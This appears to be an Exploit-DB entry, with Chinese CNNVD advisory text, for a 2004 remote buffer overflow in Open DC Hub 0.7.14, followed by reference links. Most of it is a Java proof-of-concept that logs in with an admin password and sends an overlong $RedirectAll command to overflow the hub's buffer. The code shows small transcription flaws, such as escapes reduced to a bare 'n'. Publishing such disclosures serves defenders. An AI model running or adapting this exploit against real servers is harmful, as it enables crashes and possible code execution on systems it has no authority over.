https://www.exploit-db.com/exploits/24774
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-212

OpenDCHub是一款用于直连网络的HUB软件。OpenDCHub0.7.14中存在缓冲区溢出漏洞。具有管理员权限的远程攻击者可以通过超长的RedirectAll命令，利用此漏洞执行任意代码。

source: http://www.securityfocus.com/bid/11747/info

A remote buffer overflow vulnerability reportedly affects the Open DC Hub. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into finite process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.


/* 
   Open Dc Hub (0.7.14) - Buffer Overflow - Proof Of Concept
   Coded by: Donato Ferrante
*/



import java.net.Socket;
import java.net.UnknownHostException;
import java.net.SocketTimeoutException;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintStream;



public class OpenDcHub0714_BOF_poc {


	private static int PORT  = 53696;
	private static int MAXSZ = 512;
        private static String VERSION = "0.1";

	public static void main(String [] args){

	   System.out.println(
			      "nn" +
			      "Open Dc Hub - Buffer Overflow - Proof Of Conceptn" +
			      "Version: " + VERSION + "n"      +
			      "coded by: Donato Ferranten"     +
			      "e-mail: [email protected]" +
			      "web: www.autistici.org/fdonatonn"
           );

		if(args.length <= 1){
			System.out.println(
					"Usage: java OpenDcHub0714_BOF_poc <host> <port> <admin_password>n" +
					"Note:  default port is 53696.n"
					);
			System.exit(-1);
		}

		String host = args[0];
		String admin_password = args[args.length - 1];
		int port = PORT;

		try{
			if(args.length > 2)
				port = Integer.parseInt(args[1]);
		}catch(Exception e){ port = PORT; }

		try{
		
			Socket socket = new Socket(host, port);
			socket.setSoTimeout(10000);
			BufferedReader in_stream  = new BufferedReader(new InputStreamReader(socket.getInputStream()));
			PrintStream out_stream    = new PrintStream(socket.getOutputStream());

			System.out.println(in_stream.readLine());
			System.out.println(in_stream.readLine());
			System.out.println(in_stream.readLine());
			System.out.println(in_stream.readLine());

			System.out.println("Logging...");
			out_stream.println("$adminpass " + admin_password +"|n");

			in_stream.readLine();
			String err = in_stream.readLine();

			if(err.toLowerCase().indexOf("bad") >= 0){
				System.out.println("Login failed...");
				System.out.println("Exiting...");
				System.exit(-1);
			}
			else
				System.out.println("Logged in...");

			
			System.out.println("Building test string to inject...");
			String buff = build();
			Thread.sleep(1500);

			System.out.println("Injecting test string...");
			out_stream.println(buff);
			Thread.sleep(1500);

			System.out.println("Proof_Of_Concept terminated.");

		}catch(SocketTimeoutException ste){System.out.println("Socket timeout."); System.exit(-1);}
		 catch(UnknownHostException uhe){ System.out.println("Host: " + host + " unknown.."); System.exit(-1); }
                 catch(InterruptedException ie){ System.out.println("Thread warning...");}
                 catch(Exception ioe){ System.out.println("Unable to create the socket!"); System.exit(-1);}


	}





	private static String build(){

		String over = "";
		for(int i = 0; i < MAXSZ; i++)
			over += 0x61;
		
		String ret = "$RedirectAll " + over + "|n";
		return ret;
	}


}

来源:BID
名称:11747
链接:http://www.securityfocus.com/bid/11747
来源:BUGTRAQ
名称:20041124BufferOverflowinOpenDcHub0.7.14
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110144606411674&w;=2
来源:XF
名称:open-hub-redirectall-bo(18254)
链接:http://xforce.iss.net/xforce/xfdb/18254
来源:GENTOO
名称:GLSA-200411-37
链接:http://www.gentoo.org/security/en/glsa/glsa-200411-37.xml
来源:FULLDISC
名称:20041124BufferOverflowinOpenDcHub0.7.14
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029383.html